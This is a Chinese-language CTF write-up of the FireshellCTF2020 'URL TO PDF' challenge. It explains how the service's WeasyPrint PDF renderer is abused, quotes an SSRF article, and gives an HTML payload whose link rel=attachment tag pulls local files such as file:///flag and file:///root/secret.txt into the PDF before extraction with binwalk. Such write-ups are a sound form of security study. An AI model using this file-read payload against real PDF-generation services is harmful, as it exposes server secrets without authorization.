[FireshellCTF2020]URL TO PDF
这个题目的前端和[FireshellCTF2020]ScreenShooter好相似,填写一个url,会返回一个pdf,上个题目是返回的图片
这东西应该也是和爬虫相关的,让靶机去访问vps的7777端口,监听查看请求
发现是WeasyPrint
WeasyPrint
WeasyPrint是一个用于HTML和CSS的可视化渲染引擎,可以将HTML文档导出为打印标准的PDF文件
引用文章:我的费用报告导致 Lyft 上的服务器端请求伪造 (SSRF) — Nahamsec
WeasyPrint重新定义了一组html标签,包括img,embed,object等。根据我们之前的测试,我们已经知道javascript不是利用这一点的选项。在这一点上,我们的希望很低,我们开始认为PDF生成器不再可利用,直到我们发现对<链接>内部的几个文件的引用,包括pdf.py。这使我们能够通过使用 将任何网页或本地文件的内容附加到我们的 PDF 中。
<link rel=attachment href="file:///root/secret.txt">
根据这个写index.html
<!DOCTYPE html>
<html>
<head>
<title>cai</title>
</head>
<body>
<link rel = "attachment" href = "file:///flag">
</body>
</html>
下载得到pdf文件,然后用binwalk分开
因为我使用的是root用户,所以使用如下命令
binwalk -e d0ee710813f87df641cd74b3ffec0c04.pdf --run-as=root
